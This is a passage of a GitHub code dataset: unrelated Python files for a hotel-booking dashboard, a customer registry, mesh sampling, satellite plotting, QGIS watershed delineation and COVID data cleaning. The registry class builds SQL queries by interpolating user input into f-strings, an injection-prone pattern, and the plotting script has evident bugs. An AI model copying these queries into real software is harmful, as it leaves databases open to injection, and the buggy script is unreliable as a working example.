= \"Lecture : \" + self.SubObj.code + ' ' + self.SubObj.day + ' '+ str(self.SubObj.startTime) + ' to ' + str(self.SubObj.endTime) +\n ' Tut : ' + self.SubObj.link.day + ' ' + str(self.SubObj.link.startTime) + ' to ' + str(self.SubObj.link.endTime) , pady = 10)\n\n else:\n \n #intializing Subject object\n self.SubObj = Subject(self.cd , self.dy ,int(self.stH) , int(self.stM) , int(self.enH) , int(self.enM))\n\n #intializing Subejct Label\n self.SubLabel = tk.Label(Frame, text = \"Lecture : \" + self.SubObj.code + ' ' + self.SubObj.day + ' '+ str(self.SubObj.startTime) + ' to ' + str(self.SubObj.endTime),pady = 10)\n\n\n\n\n\n","repo_name":"Abdelrhman-Hosny/CU_Schedule_Picker","sub_path":"SubjectLabel.py","file_name":"SubjectLabel.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39604364764","text":"#import\nimport streamlit as st\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n#deal with the data\ndf = pd.read_csv('hotel_bookings.csv')\n\n#Deal with missing data\ndf.isnull().sum().sort_values(ascending=False)\n\n#Processing outliers (With ipynb, we can see what data needs to be processed)\ndf.loc[df['lead_time'] > 380, ['lead_time'] ] = 380\ndf.loc[df['stays_in_weekend_nights'] > 6, ['stays_in_weekend_nights'] ] = 6\ndf.loc[df['stays_in_week_nights'] > 10, ['stays_in_week_nights'] ] = 10\ndf.loc[df['adults'] > 4, ['adults'] ] = 4\ndf.loc[df['children'] > 8, ['lead_time'] ] = 0\ndf.loc[df['babies'] > 8, ['babies'] ] = 0\ndf.loc[df['booking_changes'] > 5, ['booking_changes'] ] = 5\ndf.loc[df['days_in_waiting_list'] > 0, ['days_in_waiting_list'] ] = 1\ndf.loc[df['previous_cancellations'] > 0, ['previous_cancellations'] ] = 1\ndf.loc[df['previous_bookings_not_canceled'] > 0, ['previous_bookings_not_canceled']] = 1\n\n#Clear duplicate data\ndf.duplicated().sum()\ndf.drop_duplicates(inplace = True)\n#More than 30,000 duplicate pieces of data were deleted\n\nbase=\"dark\"\nprimaryColor=\"purple\"\n#set a cover\nst.markdown('![cover 2](https://user-images.githubusercontent.com/115609247/200618168-afd33584-0aed-4fc1-a1bf-8071a99b19c3.jpg)')\nst.title('Final project by YucenXie & BeiChen')\n\n#show the basic dataset\nst.header('Introduction of Hotel_Dataset ')\ndf\n\n#Show some pictures of basic data\nst.header('Basic conclusion about the dataset')\nfig, ax = plt.subplots(2, 3,figsize=(30, 20))\ndf['hotel'].value_counts().plot.pie(ax=ax[0,0])\nax[0,0].set_title('Distribution of the type of Hotel')\n\ndf['meal'].value_counts().plot.pie(ax=ax[0,1])\nax[0,1].axis('equal') \nax[0,1].set_title('Distribution of the type of Meal')\n\n#pic3\nconfirmed_bookings = df[df['is_canceled'] ==0]\ndata = confirmed_bookings['is_repeated_guest'].value_counts()\ncolors = sns.color_palette('Paired')\nlabels = ['new guest', 'repeated guest']\n\nax[0,2].pie(data, labels = labels, autopct = '%.0f%%', colors = colors)\nax[0,2].set_title('Bookings by new and repeated guest')\n\n#pic4\n\nsns.countplot(ax=ax[1,0],x = 'hotel', data = df, hue = 'is_canceled', palette = 'magma_r', alpha = 0.8).set(xlabel = None)\nax[1,0].set_title('Cancelation rates by hotel')\n\n#pic5\nplt.figure(figsize=(10,10))\nsns.countplot(ax=ax[1,1],x='total_of_special_requests', data=df, palette = 'ocean_r')\nax[1,1].set_title('Total Special Request', weight='bold')\nax[1,1].set_xlabel('Number of Special Request', fontsize=12)\nax[1,1].set_ylabel('Count', fontsize=12)\n\n#pic6\ndf['kids'] = df['children'] + df['babies']\ndf['family'] = np.where(df['kids'] > 0, '1', '0')\nconfirmed_bookings = df[df['is_canceled'] == 0]\n\n\npalette = [\"#457b9d\", \"#a8dadc\"]\nsns.countplot(ax=ax[1,2],data = confirmed_bookings, x = 'hotel', hue = 'family', palette = palette, alpha = 0.8).set(xlabel = None)\nax[1,2].set_title('Families by hotel')\n\nst.pyplot(fig)\n\n\n\nst.header('Some filters & Visualization')\n#Interactive tools 1\n# create a price filter\nadr_filter = st.sidebar.slider('Average room price(adr)', 62.0, 157.71, 65.0) # min, max, default\n# filter by price\ndf = df[df.adr >= adr_filter]\n\n#Interactive tools 1\n# create a multi select marker-segment\nmarket_segment_filter = st.sidebar.multiselect(\n 'Chose the Market Segment type',\n df.market_segment.unique(), # options\n df.market_segment.unique()) # defaults\n# filter by market segment\ndf = df[df.market_segment.isin(market_segment_filter)]\n\n#Interactive tools 3\n# create a babies and children filter\ndf['babies_and_children'] = df['babies'] + df['children']\nchildren_and_babies_filter = st.sidebar.radio(\n \"Chose the customers have children or not\",\n ('Only adults', 'Babies and Children with adults'))\n# filter by children/babies\nif children_and_babies_filter == 'Only adults':\n df = df[df.babies_and_children == 0]\nelif children_and_babies_filter == 'Babies and Children':\n df = df[df.babies_and_children >0]\n\n\n#Influencing factors related to cancellation rate\nst.subheader('Cancellation')\n#The relationship between cancellation rates and years and months\n\n#Year\nst.write('Cancellation rate about year and month')\ndf_cancel_year=pd.crosstab(df.arrival_date_year,df.is_canceled,margins=True)\ndf_cancel_year['cancel-percent']=df_cancel_year[1]*100/df_cancel_year['All']\ndf_cancel_year.drop('All',inplace=True)\n\n#Month\ndf_cancel_month=pd.crosstab(df.arrival_date_month,df.is_canceled,margins=True)\ndf_cancel_month['cancel-percent']=df_cancel_month[1]*100/df_cancel_month['All']\ndf_cancel_month.drop('All',inplace=True)\n\n#Typesetting\nfig, ax = plt.subplots(1, 2,figsize=(15, 5))\ndf_cancel_year['cancel-percent'].plot.bar(ax=ax[0],color='#C9BFCB')\nax[0].set_xlabel('Year')\nax[0].set_ylabel('cancellation')\ndf_cancel_month['cancel-percent'].plot.bar(ax=ax[1],color='#A58E9E')\nax[1].set_xlabel('Month')\nax[1].set_ylabel('cancellation')\nst.pyplot(fig)\n\n\n#create a bar to show the canlellation rate about the lead time\ndf_cancel_leadtime = pd.crosstab(df.lead_time,df.is_canceled,margins=True)\ndf_cancel_leadtime['cancel-percent']=df_cancel_leadtime[1]*100/df_cancel_leadtime['All']\ndf_cancel_leadtime.drop('All',axis=1,inplace=True)\ndf_cancel_leadtime.drop('All',axis=0,inplace=True)\nst.write('Cancellation rate about the lead time')\nfig, ax =plt.subplots(figsize=(15,5))\ndf_cancel_leadtime['cancel-percent'].plot(color='#BAB5D6')\nst.pyplot(fig)\n\n#Whether a deposit is paid or not and the number of cancellations\nst.write('Cancellation rate about the deposite')\ndf['is_canceled']=df['is_canceled'].astype('str')\ncanceled_bookings = df[df['is_canceled'] == '1']\nfig, ax = plt.subplots(figsize = (15, 5))\nsns.countplot(ax = ax, y = 'deposit_type', data = canceled_bookings, orient = \"h\" ,palette = 'BuPu').set(ylabel = None)\nax.bar_label(ax.containers[0], padding = 4)\nplt.title('Deposit type of cancelled bookings')\nst.pyplot(fig)\n\n#Relationship between customer type and number of cancellations\nst.write('Cancellation rate about the customer type')\nfig, ax =plt.subplots(figsize=(20, 10))\ndf1=df[df['customer_type']=='Transient']\ndf1_cancel = pd.crosstab(df1.arrival_date_month,df1.is_canceled,margins=True)\ndf1_cancel['cancel_percent']=df1_cancel['1']*100/df1_cancel['All']\ndf1_cancel.drop('All',axis=1,inplace=True)\ndf1_cancel.drop('All',axis=0,inplace=True)\ndf1_cancel=df1_cancel.reindex(['January','February','March','April','May','June','July','August','September',\n'October','November','December'])\ndf1_cancel=df1_cancel.reset_index()\n\nsns.lineplot(\n x='arrival_date_month',\n y='cancel_percent',\n data=df1_cancel,\n ci =None, \n palette = 'viridis', \n alpha = 0.6,\n label='Transient', \n lw=4 \n)\n\ndf2=df[df['customer_type']=='Contract']\ndf2_cancel = pd.crosstab(df2.arrival_date_month,df2.is_canceled,margins=True)\ndf2_cancel['cancel_percent']=df2_cancel['1']*100/df2_cancel['All']\ndf2_cancel.drop('All',axis=1,inplace=True)\ndf2_cancel.drop('All',axis=0,inplace=True)\ndf2_cancel=df2_cancel.reindex(['January','February','March','April','May','June','July','August','September',\n'October','November','December'])\ndf2_cancel=df2_cancel.reset_index()\nsns.lineplot(\n x='arrival_date_month',\n y='cancel_percent',\n data=df2_cancel,\n ci =None, \n palette = 'viridis', \n alpha = 0.6,\n label='Contract', \n lw=4 \n)\n\ndf3=df[df['customer_type']=='Transient-Party']\ndf3_cancel = pd.crosstab(df3.arrival_date_month,df3.is_canceled,margins=True)\ndf3_cancel['cancel_percent']=df3_cancel['1']*100/df3_cancel['All']\ndf3_cancel.drop('All',axis=1,inplace=True)\ndf3_cancel.drop('All',axis=0,inplace=True)\ndf3_cancel=df3_cancel.reindex(['January','February','March','April','May','June','July','August','September',\n'October','November','December'])\ndf3_cancel=df3_cancel.reset_index()\nsns.lineplot(\n x='arrival_date_month',\n y='cancel_percent',\n data=df3_cancel,\n ci =None, \n palette = 'viridis', \n alpha = 0.6,\n label='Transient-Party', \n lw=4 \n)\n\ndf4=df[df['customer_type']=='Group']\ndf4_cancel = pd.crosstab(df4.arrival_date_month,df4.is_canceled,margins=True)\ndf4_cancel['cancel_percent']=df4_cancel['1']*100/df4_cancel['All']\ndf4_cancel.drop('All',axis=1,inplace=True)\ndf4_cancel.drop('All',axis=0,inplace=True)\ndf4_cancel=df4_cancel.reindex(['January','February','March','April','May','June','July','August','September',\n'October','November','December'])\ndf4_cancel=df4_cancel.reset_index()\nsns.lineplot(\n x='arrival_date_month',\n y='cancel_percent',\n data=df4_cancel,\n ci =None, \n palette = 'viridis', \n alpha = 0.6,\n label='Group', \n lw=4 \n)\nplt.title('Cutomer type of cancelled bookings')\nst.pyplot(fig)\n\n#The relationship between cancellation rate and parking space\nst.write('Cancellation rate about the car parking and meal')\ntbl2=pd.crosstab(df.required_car_parking_spaces,df.is_canceled,margins=True)\ntbl2['cancel-percent']=tbl2['1']*100/tbl2['All']\ntbl2.drop('All',inplace=True)\nfig, ax = plt.subplots(1,2,figsize=(15, 7))\ntbl2['cancel-percent'].plot.bar(color='#e4bfcb',ax=ax[0])\nplt.xticks(rotation=0)\nplt.xlabel('required_car_parking_spaces')\nplt.ylabel('Cancellation %')\nplt.title('Cancellation rates about car parking')\nplt.show()\n\n\n#Relationship between cancellation rate and meal package\ntbl3=pd.crosstab(df.meal,df.is_canceled,margins=True)\ntbl3['cancel-percent']=tbl3['1']*100/tbl3['All']\ntbl3.drop('All',inplace=True)\ntbl3['cancel-percent'].plot.bar(color='#eec5cc',ax=ax[1])\nplt.xticks(rotation=0)\nplt.xlabel('meal')\nplt.ylabel('Cancellation %')\nplt.title('Cancellation rates about meal')\nplt.show()\nst.pyplot(fig)\n\n\nst.balloons()\n\n#adr\nst.subheader('Average room price(adr)')\n\n#ADR about the month\nst.write('ADR about the month')\n\nconfirmed_bookings = df[df['is_canceled']=='0']\nfig, ax =plt.subplots(figsize=(15, 7))\nsns.lineplot(x = 'arrival_date_month', \n y = 'adr', \n hue = 'hotel', \n data = confirmed_bookings, \n ci =None, \n palette = 'viridis', \n alpha = 0.6,\n lw=5)\nplt.title('Monthly ADR')\nplt.xlabel('Months')\n\n\nplt.tight_layout()\nst.pyplot(fig)\nst.subheader('See the analysis on the next page!')\n\n\n\n\n","repo_name":"haloikuy/Final_project_team31","sub_path":"EDA.py","file_name":"EDA.py","file_ext":"py","file_size_in_byte":10398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37495988491","text":"import pyodbc\n\n\n# BACK-END\nclass Pessoa:\n dadosconnect = \"Driver={SQL Server};Server=.;Database=BDCadastro;\"\n\n def __init__(self, cad, nome, data, cpf, cep, rua, num, bairro, comp,\n cidade, estado, pais, tel1, tel2, email, obs):\n self.cad = cad\n self.nome = nome\n self.data = data\n self.cpf = cpf\n self.cep = cep\n self.rua = rua\n self.num = num\n self.bairro = bairro\n self.comp = comp\n self.cid = cidade\n self.estado = estado\n self.pais = pais\n self.tel1 = tel1\n self.tel2 = tel2\n self.email = email\n self.obs = obs\n self.busca = []\n\n def adicionar(self):\n connection = pyodbc.connect(self.dadosconnect)\n cursor = connection.cursor()\n cursor.execute(f''' INSERT INTO Cadastro2 (Nome, DataNascimento, CPF, CEP, Logradouro, \n Número, Bairro, Complemento, Cidade, Estado, País, Telefone1, Telefone2, Email, Observação)\n \n VALUES('{self.nome}', \n '{self.data}', \n '{self.cpf}',\n '{self.cep}',\n '{self.rua}', \n '{self.num}', \n '{self.bairro}', \n '{self.comp}', \n '{self.cid}', \n '{self.estado}', \n '{self.pais}', \n '{self.tel1}', \n '{self.tel2}',\n '{self.email}',\n '{self.obs}'); ''')\n cursor.commit()\n cursor.close()\n connection.close()\n\n def excluir(self):\n connection = pyodbc.connect(self.dadosconnect)\n cursor = connection.cursor()\n # INSERIR MESSAGEBOX PARA CONFIRMAR AÇÃO\n cursor.execute(f''' DELETE FROM \n Cadastro2\n WHERE \n NumCad='{self.cad}'; ''')\n cursor.commit()\n cursor.close()\n connection.close()\n\n def procurar(self):\n connection = pyodbc.connect(self.dadosconnect)\n cursor = connection.cursor()\n cursor.execute(f'''\n SELECT \n *\n FROM \n Cadastro2 \n WHERE\n Nome='{self.nome}' ''')\n\n result = cursor.fetchone()\n self.cad = str(result[0])\n self.nome = str(result[1])\n self.data = str(result[2])\n self.cpf = str(result[3])\n self.cep = str(result[4])\n self.rua = str(result[5])\n self.num = str(result[6])\n self.bairro = str(result[7])\n self.comp = str(result[8])\n self.cid = str(result[9])\n self.estado = str(result[10])\n self.pais = str(result[11])\n self.tel1 = str(result[12])\n self.tel2 = str(result[13])\n self.email = str(result[14])\n self.obs = str(result[15])\n cursor.close()\n connection.close()\n return\n\n def editar(self):\n connection = pyodbc.connect(self.dadosconnect)\n cursor = connection.cursor()\n cursor.execute(f'''\n UPDATE \n Cadastro2\n SET\n Nome = '{self.nome}',\n DataNascimento = '{self.data}', \n CPF = '{self.cpf}',\n CEP = '{self.cep}',\n Logradouro = '{self.rua}', \n Número = '{self.num}', \n Bairro = '{self.bairro}', \n Complemento = '{self.comp}', \n Cidade = '{self.cid}', \n Estado = '{self.estado}', \n País = '{self.pais}', \n Telefone1 = '{self.tel1}', \n Telefone2 = '{self.tel2}',\n Email = '{self.email}',\n Observação = '{self.obs}'\n \n WHERE\n NumCad='{self.cad}' OR Nome='{self.nome}'\n ''')\n cursor.commit()\n print(f'{self.nome}')\n cursor.close()\n connection.close()\n return","repo_name":"liliansom/CadastroClientes","sub_path":"Pessoa.py","file_name":"Pessoa.py","file_ext":"py","file_size_in_byte":4570,"program_lang":"python","lang":"pt","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"20425514804","text":"from django.core.management.base import BaseCommand\nfrom django.core.management.base import CommandError\nfrom aclarknet.database.models import Note as model\nfrom aclarknet.database.utils import mail_compose\nfrom aclarknet.database.utils import mail_recipients\nfrom aclarknet.database.utils import mail_send\n\n\nclass Command(BaseCommand):\n help = 'Mail obj.field to obj => contacts'\n\n def add_arguments(self, parser):\n parser.add_argument('obj_type')\n parser.add_argument('obj_id')\n\n def handle(self, *args, **options):\n obj_id = options.get('obj_id')\n obj_type = options.get('obj_type')\n obj = model.objects.get(pk=obj_id)\n recipients = mail_recipients(obj)\n for first_name, email_address in recipients:\n mail_send(\n **mail_compose(\n obj,\n first_name=first_name,\n mail_to=email_address))","repo_name":"aclark4life/aclark-net-2018-2","sub_path":"aclarknet/database/management/commands/mail_obj.py","file_name":"mail_obj.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"14367965581","text":"import os\nimport argparse\nimport logging\n\nimport trimesh\nimport numpy as np\n\nfrom libmesh import check_mesh_contains\n\nimport processor.errors as errors\nimport processor.process_sample as sampler\n\n\ndef occupancies_uniform(\n f_in,\n f_out,\n dim=256,\n padding=0.1,\n overwrite=False,\n):\n # Load the mesh\n mesh = trimesh.load(f_in)\n\n # Get uniform points\n points = sampler.uniform_sample_points(dim=dim, padding=padding)\n\n # Get occupancies\n occupancies = check_mesh_contains(mesh, points)\n logging.debug(\n \"Mesh had {}/{} interior points\".format(\n occupancies.astype(int).sum(), occupancies.shape[0]\n )\n )\n\n # Save as boolean values\n if overwrite or not os.path.exists(f_out):\n logging.debug(\"Saving to: {}\".format(f_out))\n np.savez(f_out, occ=occupancies.astype(bool))\n\n\ndef process(\n obj,\n num_results,\n overwrite,\n executor,\n args,\n):\n\n dim = args.voxel_dim\n\n for idx in range(num_results):\n f_in = obj.path_b(idx)\n f_out = obj.path_b_uniform_occ(idx, dim)\n\n if os.path.exists(f_in) and (not os.path.exists(f_out) or overwrite):\n executor.graceful_submit(\n occupancies_uniform,\n f_in=f_in,\n f_out=f_out,\n overwrite=overwrite,\n dim=dim,\n )\n\n\ndef validate_outputs(\n obj,\n num_results,\n args,\n):\n\n dim = args.voxel_dim\n\n outputs = []\n for idx in range(num_results):\n if not os.path.exists(obj.path_b_uniform_occ(idx, dim)):\n outputs.append(False)\n continue\n outputs.append(True)\n return outputs\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"Computes the occupancy values for samples points on and \"\n + \"around an object. Accepts the arguments common for sampling.\"\n )\n parser.add_argument(dest=\"f_in\", type=str, help=\"Path to the input file.\")\n parser.add_argument(dest=\"f_out\", type=str, help=\"Path to the output file.\")\n parser.add_argument(\n \"--dim\",\n \"-d\",\n type=int,\n default=256,\n help=\"Dimension of point samples.\",\n )\n parser.add_argument(\n \"--padding\",\n \"-p\",\n type=float,\n default=0.1,\n help=\"Extra padding to add when performing uniform sampling. eg 0 = \"\n + \"uniform sampling is done in unit cube.\",\n )\n args = parser.parse_args()\n\n occupancies_uniform(\n f_in=args.f_in,\n f_out=args.f_out,\n dim=args.dim,\n padding=args.padding,\n )\n","repo_name":"Terascale-All-sensing-Research-Studio/DeepJoin","sub_path":"fracturing/processor/process_uniform_occupancy.py","file_name":"process_uniform_occupancy.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"26560969021","text":"# This script makes plots of the coincident micorbursts\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom datetime import datetime\nimport os\nimport sys\n\n\nsys.path.insert(0, '/home/mike/research/mission-tools/ac6')\n\nimport read_ac_data\n\n# Path containing the catalog file to validate\ncatPath = os.path.join('/home/mike/research/ac6-microburst-scale-sizes/data/'\n 'coincident_microbursts_catalogues', 'flash_catalogue_v2_sorted.txt')\npltWidth = 5 # seconds\n\nplotPath = ('/home/mike/research/ac6-microburst-scale-sizes/'\n 'data/plots/{}'.format(datetime.date.now()))\nif not os.path.exists(plotPath):\n os.makedirs(plotPath)\n print('Made plot directory at', plotPath)\n\n# Load and filter the catalog \nc = ExploreDependencies(catPath)\nc.filter()\n\n# Set up plots\nfig, ax = plt.subplots(1)\ncurrent_date = datetime.date().min\nfor i in len(c.cat['burstType']):\n if c.cat['dateTimeA'][i].date().isoformat != current_date:\n dataA = read_ac_data_wrapper('A', current_date, dType='10Hz')\n dataB = read_ac_data_wrapper('B', current_date, dType='10Hz')\n current_date = c.cat['dateTimeA'][i].date().isoformat\n \n # Pick out only the valid data\n validIdxA = np.where(dataA['dos1rate'] > 0)[0]\n validIdxB = np.where(dataB['dos1rate'] > 0)[0]\n # Plot the unshifted data\n ax[0].plot(dataA['dateTime'][validIdxA], dataA['dos1rate'][validIdxA], \n label='AC-6 A')\n ax[0].plot(dataB['dateTime'][validIdxB], dataB['dos1rate'][validIdxB], \n label='AC-6 B') \n \n # Set the time range around the coincident microburst event, and then save.\n xlim=(c.cat['dateTimeA'][i] - timedelta(seconds=pltWidth), \n c.cat['dateTimeA'][i] + timedelta(seconds=pltWidth))\n \n # Calculate ylimits from the xlimits\n idxA = np.where((dataA['dateTime'] > xlim[0]) & \n (dataA['dateTime'] < xlim[1]) &\n (dataA['dos1rate'] > 0))[0]\n idxB = np.where((dataB['dateTime'] > xlim[0]) & \n (dataB['dateTime'] < xlim[1]) &\n (dataB['dos1rate'] > 0))[0]\n ylim = (0.9*np.min(dataA['dos1rate'][idxA]), \n 1.1*np.max(dataA['dos1rate'][idxA]))\n \n ax[0].set(title='AC-6 Coincident microburst validation', xlabel='UTC', \n ylabel='dos1 [counts/s]', xlim=xlim, ylim=ylim)\n ax[0].legend(loc=1)\n \n plt.savefig(os.path.join(plotPath, ))\n \n \n \n","repo_name":"mshumko/ac6_microburst_scale_sizes","sub_path":"rabbit_holes/validation_plots.py","file_name":"validation_plots.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26980584815","text":"\"\"\"\nModel exported as python.\nName : WBT\nGroup : \nWith QGIS : 31416\n\"\"\"\n\nfrom qgis.core import QgsProcessing\nfrom qgis.core import QgsProcessingAlgorithm\nfrom qgis.core import QgsProcessingMultiStepFeedback\nfrom qgis.core import QgsProcessingParameterRasterLayer\nfrom qgis.core import QgsProcessingParameterNumber\nfrom qgis.core import QgsProcessingParameterMapLayer\nfrom qgis.core import QgsProcessingParameterVectorDestination\nfrom qgis.core import QgsProcessingParameterRasterDestination\nfrom qgis.core import QgsCoordinateReferenceSystem\nimport processing\n\n\nclass Wbt(QgsProcessingAlgorithm):\n\n def initAlgorithm(self, config=None):\n self.addParameter(QgsProcessingParameterRasterLayer('DEM', 'DEM', defaultValue=None))\n self.addParameter(QgsProcessingParameterNumber('Streamtreshold', 'Stream_treshold', type=QgsProcessingParameterNumber.Integer, minValue=-3, maxValue=10, defaultValue=1))\n self.addParameter(QgsProcessingParameterMapLayer('pour', 'pour', defaultValue=None, types=[QgsProcessing.TypeVectorPoint]))\n self.addParameter(QgsProcessingParameterVectorDestination('Watershed', 'Watershed', type=QgsProcessing.TypeVectorPolygon, createByDefault=True, defaultValue=None))\n self.addParameter(QgsProcessingParameterRasterDestination('Streams', 'Streams', createByDefault=True, defaultValue=None))\n self.addParameter(QgsProcessingParameterVectorDestination('Snapped', 'snapped', type=QgsProcessing.TypeVectorPoint, createByDefault=True, defaultValue=None))\n\n def processAlgorithm(self, parameters, context, model_feedback):\n # Use a multi-step feedback, so that individual child algorithm progress reports are adjusted for the\n # overall progress through the model\n feedback = QgsProcessingMultiStepFeedback(11, model_feedback)\n results = {}\n outputs = {}\n\n # Rectangles, ovals, diamonds\n alg_params = {\n 'HEIGHT': 2,\n 'INPUT': parameters['pour'],\n 'ROTATION': 0,\n 'SEGMENTS': 5,\n 'SHAPE': 0,\n 'WIDTH': 2,\n 'OUTPUT': QgsProcessing.TEMPORARY_OUTPUT\n }\n outputs['RectanglesOvalsDiamonds'] = processing.run('native:rectanglesovalsdiamonds', alg_params, context=context, feedback=feedback, is_child_algorithm=True)\n\n feedback.setCurrentStep(1)\n if feedback.isCanceled():\n return {}\n\n # ClipRasterToPolygon\n alg_params = {\n 'input': parameters['DEM'],\n 'maintain_dimensions': False,\n 'polygons': outputs['RectanglesOvalsDiamonds']['OUTPUT'],\n 'output': QgsProcessing.TEMPORARY_OUTPUT\n }\n outputs['Cliprastertopolygon'] = processing.run('wbt:ClipRasterToPolygon', alg_params, context=context, feedback=feedback, is_child_algorithm=True)\n\n feedback.setCurrentStep(2)\n if feedback.isCanceled():\n return {}\n\n # Assign projection\n alg_params = {\n 'CRS': QgsCoordinateReferenceSystem('EPSG:4326'),\n 'INPUT': outputs['Cliprastertopolygon']['output']\n }\n outputs['AssignProjection'] = processing.run('gdal:assignprojection', alg_params, context=context, feedback=feedback, is_child_algorithm=True)\n\n feedback.setCurrentStep(3)\n if feedback.isCanceled():\n return {}\n\n # Assign projection\n alg_params = {\n 'CRS': QgsCoordinateReferenceSystem('EPSG:4326'),\n 'INPUT': outputs['RectanglesOvalsDiamonds']['OUTPUT'],\n 'OUTPUT': QgsProcessing.TEMPORARY_OUTPUT\n }\n outputs['AssignProjection'] = processing.run('native:assignprojection', alg_params, context=context, feedback=feedback, is_child_algorithm=True)\n\n feedback.setCurrentStep(4)\n if feedback.isCanceled():\n return {}\n\n # BreachDepressions\n alg_params = {\n 'dem': outputs['Cliprastertopolygon']['output'],\n 'fill_pits': False,\n 'flat_increment': None,\n 'max_depth': None,\n 'max_length': None,\n 'output': QgsProcessing.TEMPORARY_OUTPUT\n }\n outputs['Breachdepressions'] = processing.run('wbt:BreachDepressions', alg_params, context=context, feedback=feedback, is_child_algorithm=True)\n\n feedback.setCurrentStep(5)\n if feedback.isCanceled():\n return {}\n\n # FillDepressions\n alg_params = {\n 'dem': outputs['Breachdepressions']['output'],\n 'fix_flats': True,\n 'flat_increment': None,\n 'max_depth': None,\n 'output': QgsProcessing.TEMPORARY_OUTPUT\n }\n outputs['Filldepressions'] = processing.run('wbt:FillDepressions', alg_params, context=context, feedback=feedback, is_child_algorithm=True)\n\n feedback.setCurrentStep(6)\n if feedback.isCanceled():\n return {}\n\n # FlowAccumulationFullWorkflow\n alg_params = {\n 'clip': False,\n 'dem': outputs['Filldepressions']['output'],\n 'esri_pntr': False,\n 'log': False,\n 'out_type': 1,\n 'out_accum': QgsProcessing.TEMPORARY_OUTPUT,\n 'out_dem': QgsProcessing.TEMPORARY_OUTPUT,\n 'out_pntr': QgsProcessing.TEMPORARY_OUTPUT\n }\n outputs['Flowaccumulationfullworkflow'] = processing.run('wbt:FlowAccumulationFullWorkflow', alg_params, context=context, feedback=feedback, is_child_algorithm=True)\n\n feedback.setCurrentStep(7)\n if feedback.isCanceled():\n return {}\n\n # ExtractStreams\n alg_params = {\n 'flow_accum': outputs['Flowaccumulationfullworkflow']['out_accum'],\n 'threshold': parameters['Streamtreshold'],\n 'zero_background': False,\n 'output': parameters['Streams']\n }\n outputs['Extractstreams'] = processing.run('wbt:ExtractStreams', alg_params, context=context, feedback=feedback, is_child_algorithm=True)\n results['Streams'] = outputs['Extractstreams']['output']\n\n feedback.setCurrentStep(8)\n if feedback.isCanceled():\n return {}\n\n # SnapPourPoints\n alg_params = {\n 'flow_accum': outputs['Flowaccumulationfullworkflow']['out_accum'],\n 'pour_pts': parameters['pour'],\n 'snap_dist': 0.01,\n 'output': parameters['Snapped']\n }\n outputs['Snappourpoints'] = processing.run('wbt:SnapPourPoints', alg_params, context=context, feedback=feedback, is_child_algorithm=True)\n results['Snapped'] = outputs['Snappourpoints']['output']\n\n feedback.setCurrentStep(9)\n if feedback.isCanceled():\n return {}\n\n # Watershed\n alg_params = {\n 'd8_pntr': outputs['Flowaccumulationfullworkflow']['out_pntr'],\n 'esri_pntr': False,\n 'pour_pts': outputs['Snappourpoints']['output'],\n 'output': QgsProcessing.TEMPORARY_OUTPUT\n }\n outputs['Watershed'] = processing.run('wbt:Watershed', alg_params, context=context, feedback=feedback, is_child_algorithm=True)\n\n feedback.setCurrentStep(10)\n if feedback.isCanceled():\n return {}\n\n # Polygonize (raster to vector)\n alg_params = {\n 'BAND': 1,\n 'EIGHT_CONNECTEDNESS': False,\n 'EXTRA': '',\n 'FIELD': 'DN',\n 'INPUT': outputs['Watershed']['output'],\n 'OUTPUT': parameters['Watershed']\n }\n outputs['PolygonizeRasterToVector'] = processing.run('gdal:polygonize', alg_params, context=context, feedback=feedback, is_child_algorithm=True)\n results['Watershed'] = outputs['PolygonizeRasterToVector']['OUTPUT']\n return results\n\n def name(self):\n return 'WBT'\n\n def displayName(self):\n return 'WBT'\n\n def group(self):\n return ''\n\n def groupId(self):\n return ''\n\n def createInstance(self):\n return Wbt()\n","repo_name":"hckaraman/Mike_Tools","sub_path":"QGIS/delineation_model.py","file_name":"delineation_model.py","file_ext":"py","file_size_in_byte":7985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"634991121","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nimport pandas as pd\nimport numpy as np\n\n\n# %%\ndef fill_strange_vals(df: pd.DataFrame) -> pd.DataFrame:\n df = df.replace('<15',value = 14)\n df['agas_code'] = df['agas_code'].fillna('999.0') # random statistical area\n return df\n\n\n# %%\ndef cols_to_int(df: pd.DataFrame) -> pd.DataFrame:\n columns = [\n 'agas_code',\n 'accumulated_cases',\n 'accumulated_recoveries',\n 'accumulated_deaths',\n 'accumulated_hospitalized',\n 'accumulated_vaccination_first_dose',\n 'accumulated_vaccination_second_dose',\n 'accumulated_diagnostic_tests'\n ]\n for h in columns:\n try:\n df[h]= df[h].astype('int')\n except:\n df[h]= df[h].astype('float')\n return df\n\n\n# %%\ndef bin_to_int(df: pd.DataFrame):\n return df.replace({False: 0, True: 1}, inplace=True)\n\n\n# %%\ndef drop_cols(df: pd.DataFrame):\n columns = [\n 'town',\n # 'new_cases_on_date',\n # 'new_recoveries_on_date',\n # 'new_hospitalized_on_date',\n # 'new_deaths_on_date',\n # 'new_diagnostic_tests_on_date',\n 'new_vacc_first_dose_on_date',\n 'new_vacc_second_dose_on_date',\n 'accumulated_vaccination_first_dose',\n 'accumulated_vaccination_second_dose'\n ]\n return df.drop(columns, axis=1)\n\n\n# %%\ndef calc_changes(df: pd.DataFrame):\n df = df.sort_values(by=[\"agas_code\",\"date\"])\n df = df.assign(new_cases = ( df['accumulated_cases'] - df['accumulated_recoveries'] - df['accumulated_deaths']) )\n df[\"new_cases_percent\"] = df.groupby(\"agas_code\")[\"new_cases\"].pct_change()\n\n df[\"new_deaths\"] = df.groupby(\"agas_code\")[\"accumulated_deaths\"].diff()\n df[\"new_recoveries\"] = 